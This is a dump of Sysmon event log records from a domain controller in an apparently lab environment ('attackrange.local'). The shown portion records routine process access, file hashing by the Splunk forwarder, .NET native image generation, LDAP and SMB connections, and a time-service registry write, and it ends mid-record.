10341000x800000000000000019936Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.827{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A183-60D3-2403-00000000CF01}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019935Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.827{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A183-60D3-2403-00000000CF01}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019934Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.672{4DB9351A-A183-60D3-2403-00000000CF01}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000019933Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.609{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61C262C23091B0F245AB18BD3A3C10D5,SHA256=6239DECB4B78E37C21BD629086295782A5A08E95AB7668D51DD0CAC2E1F54CF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019932Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.546{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A183-60D3-2303-00000000CF01}4456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019931Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.531{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A183-60D3-2303-00000000CF01}4456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019930Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.531{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A183-60D3-2303-00000000CF01}4456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019929Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.437{4DB9351A-A181-60D3-2103-00000000CF01}7036NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SFAE3EP180\System.Runtime.Serialization.ni.dll.auxMD5=3D84DB165ECCE73AE3BD3D388DF02345,SHA256=CA86DF1C03C0304B4956A0EDE7A597A323936886ED8927D1E4D2869EE1CBD1A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019928Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.437{4DB9351A-A181-60D3-2103-00000000CF01}7036NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SFAE3EP180\System.Runtime.Serialization.ni.dllMD5=B17184CBA4F7BA09DAA13DE7947AFAB7,SHA256=61FE390E5BC862993C2D101BACB76CB487DC9C161B3A0AF08EFAC87EA2E4776C,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:59.359{4DB9351A-A181-60D3-2103-00000000CF01}7036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b7c-0\System.Runtime.Serialization.dll2021-06-23 21:02:59.359 23542300x800000000000000019948Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.609{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4DF6EA952F0A1920501F14F6C665F38,SHA256=FB1AABEB6D7247B65E2357D50AB5A873248AC583093CF6F7E6EB0E673C38243B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019947Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.531{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=12DEB75FDA6303E5F7CC9574DB369115,SHA256=EF90ADB6278B2F309ECD2FEB534F37F0DAE2C87ACD060088EAB4C751889B3911,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019946Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.115{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61403-false10.0.1.12-8000- 10341000x800000000000000019945Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.452{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A184-60D3-2503-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019944Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.437{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A184-60D3-2503-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019943Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.437{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A184-60D3-2503-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019942Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.296{4DB9351A-9DDB-60D3-0B00-00000000CF01}628840C:\Windows\system32\lsass.exe{4DB9351A-9DD8-60D3-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000019955Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:01.640{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5976CFDC5E8D84F08928C6BBC82676EC,SHA256=42165B69A82CB01B250ED41FC6F92132123E04852698CAC83990A870DCA91B98,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019954Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.357{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61406-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 354300x800000000000000019953Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.357{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61406-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 354300x800000000000000019952Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.252{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61405-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019951Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.252{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61405-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019950Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.244{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61404-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000019949Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.244{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61404-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 23542300x800000000000000019956Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:02.671{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F4C3532F4E679F0F1D84F0A8451B5D5,SHA256=F81112912A927AE44002BECC8AA175CC2B66900AB44C9024195CD80FC3F8CF2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019957Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:03.687{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8DC8D9363805161D1E4B110777FB48E,SHA256=0117062EEB719FD4A15D22254373A5D771672E5E4F0DCED5223E9A1E34A2A064,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019959Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:04.687{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B023F65CBBF3C732A12FBF1D88CA1C2C,SHA256=EF0F3ADF08BE3D7F814F8D0369FA46C2F047F19DBD863DC24569035F167FD834,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019958Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:03.194{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61407-false10.0.1.12-8000- 23542300x800000000000000019960Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:05.734{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6075BFFAB08B3D8E6FF5E3BAEAD0C203,SHA256=BACA9220F71C3166F9CF47FC12F552266B034E831FA982095A38C194642200BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019962Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:06.765{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DCAE1A7E67DF8DB4AD09AA7DBD45004,SHA256=D1E99286AEC2EB094CF06253CD8CB05B0E991A1974753F5FFA9435D7F4C08905,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000019961Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:03:06.468{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d76873-0x29eda44d) 23542300x800000000000000019963Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:07.905{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B42E02999E534B94D9C0A66C763A733E,SHA256=87EA53E12E41989842263272AE9CA5299ECBD25E265ACF3463EC854A9A06963C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019964Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:08.937{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCA219221A9028EC34851AC96F3AAA1E,SHA256=AC4103B994C287A23F99269335C065155C57A6597E42CE3E0C20174E0A73EB8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019966Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:09.937{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D629FB6CB3BBD0DC103AE01445943776,SHA256=014773955F2770594C10456C56301390D73068C4C01806DBB2980E0150B39469,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019965Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:08.209{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61408-false10.0.1.12-8000- 23542300x800000000000000019969Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:10.938{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B175E43A118CC1F7BD018E619872A4A9,SHA256=188984E658D4A368CBB7D30D39125AAEBC1069E452EE96D7CDE1B011B9610CF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019968Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:10.750{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3649BB154A1CE5FA7314DDE40796892B,SHA256=02CC8DF31F720C4493C99A02DC5D4BBAE92F73AFDD5301CC0CD2B985C62AA247,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019967Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:10.750{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1B23744CBD1989AAB272ED10B32DCF15,SHA256=675F89764E82B76270758B5F1BB0047833C0F01AFCED5A5E7050146BF88F3775,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019982Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:11.953{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F583FB92A7E1CE0DDA2E4BDA4DE84D3E,SHA256=20D3A6FD32B6867DF78AD822F7B42F73E5083250C9FA184D1195D8D46672B4F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019981Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:11.719{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A18F-60D3-2603-00000000CF01}6152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019980Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:11.703{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A18F-60D3-2603-00000000CF01}6152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019979Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 